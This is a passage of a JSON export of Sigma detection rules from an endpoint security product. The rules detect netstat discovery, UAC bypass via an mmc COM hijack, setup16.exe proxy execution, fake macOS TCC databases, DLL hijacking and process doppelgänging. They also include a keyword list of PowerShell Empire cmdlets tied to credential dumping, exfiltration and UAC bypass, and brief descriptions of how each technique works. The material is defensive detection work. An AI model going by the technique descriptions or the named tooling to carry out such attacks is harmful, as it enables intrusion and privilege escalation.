ParentImage|endswith: '\\webexmta.exe'\n GrandparentImage|endswith:\n - '\\atmgr.exe'\n - '\\ptoneclk.exe'\n\n exclusion_vagrant:\n GrandparentImage: '?:\\HashiCorp\\Vagrant\\bin\\vagrant.exe'\n ParentImage|endswith: '?:\\HashiCorp\\Vagrant\\embedded\\mingw64\\bin\\ruby.exe'\n\n exclusion_commvault_diagnostics:\n GrandparentImage|endswith: '\\CvDiagnostics.exe'\n\n exclusion_parent:\n - ParentImage:\n - '?:\\WindowsAzure\\GuestAgent_*\\WaAppAgent.exe'\n - '?:\\WindowsAzure\\GuestAgent_*\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\GuestAgent_*\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\Packages\\WaAppAgent.exe'\n - '?:\\WindowsAzure\\Packages\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\Packages_*\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\SAP\\scc20\\SCCHost.exe'\n - '?:\\oracle\\product\\\\*\\agent\\agent_*\\perl\\bin\\perl.exe'\n - ParentCommandLine:\n - '?:\\windows\\system32\\cscript.exe *\\manageengine\\opmanager\\appmanager\\working\\conf\\application\\scripts\\diagnostics\\selfmonitor.vbs *'\n - '*\\safeq6\\spoc\\terminalserver\\terminalserver.exe -displayname ysoft *'\n - '?:\\Windows\\System32\\cmd.exe /c ?:\\Windows\\System32\\netstat.exe -ano > ?:\\Windows\\TEMP\\nessus_*.TMP & ren ?:\\Windows\\TEMP\\nessus_*.TMP nessus_*.TXT'\n\n exclusion_grandparent:\n - GrandparentImage:\n - '*\\mon-assistant-marche-public\\Mon Assistant Marchés Publics.exe'\n - '*\\mon-assistant-marche-public-ecole\\Mon Assistant Marchés Publics ECOLE.exe'\n - '*\\AppData\\Local\\Programs\\oz-client\\Poly Lens.exe'\n - '*\\AppData\\Roaming\\ACEStream\\engine\\ace_engine.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Fleet\\Fleet.exe'\n - '*\\Ankama Launcher\\Ankama Launcher.exe'\n - '?:\\Tenable\\Tenable.ad\\Tools\\nssm.exe'\n - '?:\\Windows\\LTSvc\\LTSVC.exe'\n - GrandparentCommandLine:\n - '?:\\Windows\\SYSTEM32\\cmd.exe /c ?:\\Program Files\\Siemens\\syngo\\OperationalManagement\\HealthCheck\\\\*.bat'\n - '*\\FileMaker\\FileMaker Server\\Admin\\FAC\\facstart.sh'\n - '?:\\Windows\\system32\\cmd.exe /c *\\Semantic\\Easily.Semantic.Solr\\bin\\solr.cmd status'\n - 'php */Kiamo*/bin/modules/resources/scheduler/netstat/netstat_tcp.php'\n - 'php resources\\scheduler\\netstat\\netstat_tcp.php'\n - '?:\\WINDOWS\\system32\\cmd.exe /c *\\solr-?.?.?\\bin\\Solr_New.bat'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\APPLIS\\EASILY\\SERVICE_SEM\\Semantic\\Easily.Semantic.Solr\\bin\\solr.cmd *'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Program Files (x86)\\F5 VPN\\f5fpclientW.exe'\n - '?:\\Program Files (x86)\\Talend-Studio\\studio\\Talend-Studio-win-x86_64.exe'\n - '?:\\Windows\\ADDMRemQuery_x86_64_v2.exe'\n - '?:\\ProgramData\\KMSAutoS\\KMSAuto Net.exe'\n - '\\Start_Programs\\Windows_i386-32\\acslaunch_win-32.exe'\n - '\\Start_Programs\\Windows_x86-64\\acslaunch_win-64.exe'\n - '\\DSS\\DSS Server\\VMS Service\\VMS_Service.exe|?:\\Windows\\System32\\services.exe'\n - '\\SER\\Doxis\\DoxisOrgaTransmitter*\\OrgaTransmitter.exe'\n - '?:\\Program Files\\Veritas\\NetBackup\\bin\\support\\nbsu.exe'\n - '?:\\Program Files\\totalcmd\\TOTALCMD64.EXE'\n - '\\SASHome\\SASStudioSingleUser\\\\*\\SASStudioHost.exe'\n\n exclusion_openview:\n CommandLine: 'netstat -rnv'\n ParentCommandLine: 'cmd /c netstat -rnv'\n CurrentDirectory: '?:\\Program Files\\HP OpenView\\Data\\bin\\instrumentation'\n\n exclusion_stratoprobe:\n ParentCommandLine: 'cmd /c ?:\\temp\\StratoProbe\\\\????????????????????????????????\\stratoStat.bat'\n\n exclusion_examshield:\n CommandLine: 'netstat -ano'\n ParentCommandLine: 'cmd.exe /C netstat -ano'\n GrandparentImage|endswith: '\\ExamShield.exe'\n\n exclusion_oracle_agent:\n ParentCommandLine|contains:\n - '\\virtual\\agent12c\\core\\\\*\\perl\\bin\\perl *\\virtual\\agent12c\\core\\\\*/sysman/'\n - '\\agent_*\\perl\\bin\\perl ?:\\\\*\\agent_*/sysman/admin/scripts/openports.pl'\n - '\\agent_*\\perl\\bin\\perl ?:\\\\*\\agent_*/sysman/admin/scripts/insecureservices.pl'\n\n exclusion_arcgiswebappbuilder:\n CurrentDirectory|endswith: '\\arcgis-web-appbuilder-*\\ArcGISWebAppBuilder\\server\\'\n GrandparentCommandLine|startswith: '?:\\Windows\\system32\\cmd.exe /c *\\arcgis-web-appbuilder-*\\ArcGISWebAppBuilder\\startup.bat'\n\n exclusion_dicomlistener:\n ParentImage|endswith: '\\XnDicomListener\\XnDicomListener.exe'\n GrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_netstat:\n # netstat -r\n ParentCommandLine: '?:\\Windows\\system32\\cmd.exe /c ?:\\Windows\\system32\\route.exe print'\n\n exclusion_oracle:\n CommandLine: 'netstat -an'\n ParentImage:\n - '?:\\Oracle\\\\*\\bin\\perl.exe'\n - '?:\\\\*\\perl\\bin\\perl.exe'\n - '*\\bin\\MSWin32-x86\\perl.exe'\n GrandparentImage:\n - '*\\BIN\\emagent.exe'\n - '*/bin/emagent'\n\n exclusion_semantic:\n CommandLine|contains: '\\Semantic\\Easily.Semantic.Solr\\bin\\solr.cmd'\n\n exclusion_kiamo:\n GrandparentImage:\n - '?:\\Kiamo*\\bin\\third_packages\\PHP\\php.exe'\n - '?:\\Kiamo*\\bin\\third_packages\\PHP?\\php.exe'\n\n exclusion_git:\n ParentImage:\n - '*\\AppData\\Local\\Programs\\Git\\usr\\bin\\bash.exe'\n - '*\\AppData\\Local\\Programs\\Git\\usr\\bin\\sh.exe'\n\n exclusion_vmware:\n # get-versions.bat\n ProcessAncestors|contains: '\\cmd.exe|?:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe|'\n\n exclusion_pulse:\n ParentImage|endswith: '\\AppData\\Roaming\\Pulse Secure\\Host Checker\\dsHostChecker.exe'\n\n exclusion_mobaxterm:\n ParentImage: '?:\\Users\\\\*\\Documents\\MobaXterm\\slash\\bin\\bash.exe'\n\n exclusion_perl:\n - ParentImage: '?:\\Perl64\\bin\\perl.exe'\n - GrandparentImage: '?:\\Perl64\\bin\\perl.exe'\n\n exclusion_servicenow:\n ParentCommandLine: 'cmd /c netstat.exe -ano > \\\\\\\\127.0.0.1\\admin$\\temp\\psscript_output_*.txt 2>\\\\\\\\127.0.0.1\\admin$\\temp\\psscript_err_*.txt'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e90145a1-9e20-4937-ad01-c8777f3af8c6",
"rule_name": "Network Statistics Discovered via Netstat (Windows)",
"rule_description": "Detects the execution of netstat.exe, a tool often used by attackers to gather detailed information about a computer's network connections.\nAdversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.\nIt is recommended to analyze the process responsible for the execution of netstat as well as to look for other malicious actions on the host.\n",
"rule_creation_date": "2021-05-17",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1049"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e90e9976-8766-40f2-ad94-ebd9bc6788da",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077381Z",
"creation_date": "2026-03-23T11:45:34.077383Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077387Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/"
],
"name": "t1548_002_prepare_uac_bypass_mmc_comhijack.yml",
"content": "title: Mmc UAC Bypass Prepared\nid: e90e9976-8766-40f2-ad94-ebd9bc6788da\ndescription: |\n Detects preparation of UAC bypass via \"mmc.exe\" by using the @{0A29FF9E-7F9C-4437-8B11-F424491E3931} CLSID (NDP SymBinder).\n By hijacking the \"Server\" registry value for this COM class, it is possible to make \"mmc.exe\" load an arbitrary DLL with high integrity.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the registry change to look for malicious content or actions.\nreferences:\n - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\ndate: 2020/10/26\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.UACBypass\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'CreateKey'\n TargetObject: 'HKU\\\\*\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\Server'\n\n exclusion_devenv:\n Image|endswith: '\\devenv.exe' # c:\\program files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\devenv.exe\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e90e9976-8766-40f2-ad94-ebd9bc6788da",
"rule_name": "Mmc UAC Bypass Prepared",
"rule_description": "Detects preparation of UAC bypass via \"mmc.exe\" by using the @{0A29FF9E-7F9C-4437-8B11-F424491E3931} CLSID (NDP SymBinder).\nBy hijacking the \"Server\" registry value for this COM class, it is possible to make \"mmc.exe\" load an arbitrary DLL with high integrity.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the registry change to look for malicious content or actions.\n",
"rule_creation_date": "2020-10-26",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e91f013a-c074-4ab7-afd2-740f004c0caf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609031Z",
"creation_date": "2026-03-23T11:45:34.609035Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609042Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.hexacorn.com/blog/2024/10/12/the-sweet16-the-oldbin-lolbin-called-setup16-exe/",
"https://x.com/Hexacorn/status/1845212255891120452",
"https://attack.mitre.org/techniques/T1053/003/"
],
"name": "t1053_003_suspicious_execution_setup16.yml",
"content": "title: Suspicious Execution via setup16.exe\nid: e91f013a-c074-4ab7-afd2-740f004c0caf\ndescription: |\n Detects the execution of an LST file through 'setup16.exe'.\n 'setup16.exe' is an old Windows binary that can be used for customized installations, taking an LST file as input which defines setup fields.\n The LST file can define different fields which could be abused by malicious actors for execution.\n It is recommended to review the execution context of 'setup16.exe' and to investigate its child process(es).\nreferences:\n - https://www.hexacorn.com/blog/2024/10/12/the-sweet16-the-oldbin-lolbin-called-setup16-exe/\n - https://x.com/Hexacorn/status/1845212255891120452\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2024/10/14\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\setup16.exe'\n ProcessParentOriginalFileName: 'setup16.exe'\n\n filter_acmsetup:\n Image|endswith: '\\acmsetup.exe'\n CommandLine|contains|all:\n - 'acmsetup'\n - ' /t '\n - ' /s '\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e91f013a-c074-4ab7-afd2-740f004c0caf",
"rule_name": "Suspicious Execution via setup16.exe",
"rule_description": "Detects the execution of an LST file through 'setup16.exe'.\n'setup16.exe' is an old Windows binary that can be used for customized installations, taking an LST file as input which defines setup fields.\nThe LST file can define different fields which could be abused by malicious actors for execution.\nIt is recommended to review the execution context of 'setup16.exe' and to investigate its child process(es).\n",
"rule_creation_date": "2024-10-14",
"rule_modified_date": "2025-02-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e9311458-4875-4c6f-b493-0592de1251b1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095754Z",
"creation_date": "2026-03-23T11:45:34.095756Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095760Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/inital-research-of-jokerspy",
"https://attack.mitre.org/techniques/T1548/006/"
],
"name": "t1548_006_susp_tcc_database_created.yml",
"content": "title: Suspicious TCC Database File Created\nid: e9311458-4875-4c6f-b493-0592de1251b1\ndescription: |\n Detects a suspicious creation of the Transparency, Consent, & Control (TCC) database in a non-standard folder.\n Adversaries may create a fake TCC database while exploiting vulnerabilities to bypass TCC restrictions and execute malicious content with privileged access.\n It is recommended to check if the process creating the database has legitimate reasons to do so.\nreferences:\n - https://www.elastic.co/security-labs/inital-research-of-jokerspy\n - https://attack.mitre.org/techniques/T1548/006/\ndate: 2024/07/22\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.006\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.PrivilegeEscalation\n - classification.macOS.Behavior.SystemModification\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_create:\n Kind: 'create'\n Path|endswith: '/TCC.db'\n ProcessImage|contains: '?'\n\n filter_files:\n # /Library/Application Support/com.apple.TCC/TCC.db\n # ~/Library/Application Support/com.apple.TCC/TCC.db\n - Path|endswith: '/Library/Application Support/com.apple.TCC/TCC.db'\n - TargetPath|endswith: '/Library/Application Support/com.apple.TCC/TCC.db'\n\n condition: all of selection_* and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e9311458-4875-4c6f-b493-0592de1251b1",
"rule_name": "Suspicious TCC Database File Created",
"rule_description": "Detects a suspicious creation of the Transparency, Consent, & Control (TCC) database in a non-standard folder.\nAdversaries may create a fake TCC database while exploiting vulnerabilities to bypass TCC restrictions and execute malicious content with privileged access.\nIt is recommended to check if the process creating the database has legitimate reasons to do so.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e93663a6-76e2-4f02-a8c1-5b3319ff5693",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086806Z",
"creation_date": "2026-03-23T11:45:34.086808Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086813Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_immersivetpmvscmgrsvr.yml",
"content": "title: DLL Hijacking via immersivetpmvscmgrsvr.exe\nid: e93663a6-76e2-4f02-a8c1-5b3319ff5693\ndescription: |\n Detects potential Windows DLL Hijacking via immersivetpmvscmgrsvr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'immersivetpmvscmgrsvr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\profapi.dll'\n - '\\winscard.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e93663a6-76e2-4f02-a8c1-5b3319ff5693",
"rule_name": "DLL Hijacking via immersivetpmvscmgrsvr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via immersivetpmvscmgrsvr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e95e0452-fb72-4d16-ba86-5c75984a02b2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595865Z",
"creation_date": "2026-03-23T11:45:34.595888Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595896Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Kevin-Robertson/Inveigh",
"https://gist.github.com/monoxgas/9d238accd969550136db",
"https://gist.github.com/HarmJ0y/c84065c0c487d4c74cc1",
"https://github.com/secmode/Invoke-Apex",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_malicious_cmdlet_empire_script.yml",
"content": "title: Malicious PowerShell Empire Commandlets\nid: e95e0452-fb72-4d16-ba86-5c75984a02b2\ndescription: |\n Detects various malicious commandlets in PowerShell scripts, generally associated with the Empire framework.\n Attackers may use the PowerShell Empire framework for executing post-exploitation tasks, such as privilege escalation, persistence, credential harvesting, and lateral movement within a compromised network.\n It is recommended to immediately investigate actions performed via PowerShell and other suspicious actions on the host to determine whether they are the result of an ongoing security audit or an active attacker.\nreferences:\n - https://github.com/Kevin-Robertson/Inveigh\n - https://gist.github.com/monoxgas/9d238accd969550136db\n - https://gist.github.com/HarmJ0y/c84065c0c487d4c74cc1\n - https://github.com/secmode/Invoke-Apex\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2021/06/22\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Framework.Empire\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n - 'Get-FoxDump'\n - 'Get-Screenshot'\n - 'Invoke-NetRipper'\n - 'Invoke-EgressCheck'\n - 'Invoke-PostExfil'\n - 'Invoke-PSInject'\n - 'New-HoneyHash'\n - 'Invoke-PowerDump'\n - 'Exploit-Jboss'\n - 'Invoke-Paranoia'\n - 'Invoke-WinEnum'\n - 'Invoke-ARPScan'\n - 'Invoke-BackdoorLNK'\n - 'Invoke-BypassUAC'\n - 'Invoke-Tater'\n\n exclusion_signageos:\n # Get-ScreenshotHelper.ps1 + Get-Screenshot.ps1\n ProcessCommandLine: '*\\signageos\\server\\powershell\\Get-Screenshot*.ps1 -screenshotFilePath *\\signageOS\\fileSystem\\tmp\\screenshots\\\\*.png'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e95e0452-fb72-4d16-ba86-5c75984a02b2",
"rule_name": "Malicious PowerShell Empire Commandlets",
"rule_description": "Detects various malicious commandlets in PowerShell scripts, generally associated with the Empire framework.\nAttackers may use the PowerShell Empire framework for executing post-exploitation tasks, such as privilege escalation, persistence, credential harvesting, and lateral movement within a compromised network.\nIt is recommended to immediately investigate actions performed via PowerShell and other suspicious actions on the host to determine whether they are the result of an ongoing security audit or an active attacker.\n",
"rule_creation_date": "2021-06-22",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e95e0452-fb72-4d16-c2c6-5c75984af301",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090178Z",
"creation_date": "2026-03-23T11:45:34.090180Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090184Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/",
"https://github.com/hasherezade/process_doppelganging",
"https://attack.mitre.org/techniques/T1055/013/"
],
"name": "t1055_process_doppelganging.yml",
"content": "title: Process Doppelgänging Detected\nid: e95e0452-fb72-4d16-c2c6-5c75984af301\ndescription: |\n Detects the process doppelgänging injection technique.\n Process doppelgänging, similarly to process hollowing/RunPE, involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. However, in the case of process doppelgänging, the file image is overwritten via NTFS transactions before the process is even started.\n It is recommended to investigate the process responsible for the injection as well as the injected process to look for malicious actions or content.\nreferences:\n - https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/\n - https://github.com/hasherezade/process_doppelganging\n - https://attack.mitre.org/techniques/T1055/013/\ndate: 2025/09/01\nmodified: 2025/11/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055.013\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_agent_version:\n AgentVersion|gte|version: 4.14.0\n\n selection_transacted:\n IsFileObjectTransacted: 'true'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e95e0452-fb72-4d16-c2c6-5c75984af301",
"rule_name": "Process Doppelgänging Detected",
"rule_description": "Detects the process doppelgänging injection technique.\nProcess doppelgänging, similarly to process hollowing/RunPE, involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. However, in the case of process doppelgänging, the file image is overwritten via NTFS transactions before the process is even started.\nIt is recommended to investigate the process responsible for the injection as well as the injected process to look for malicious actions or content.\n",
"rule_creation_date": "2025-09-01",
"rule_modified_date": "2025-11-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
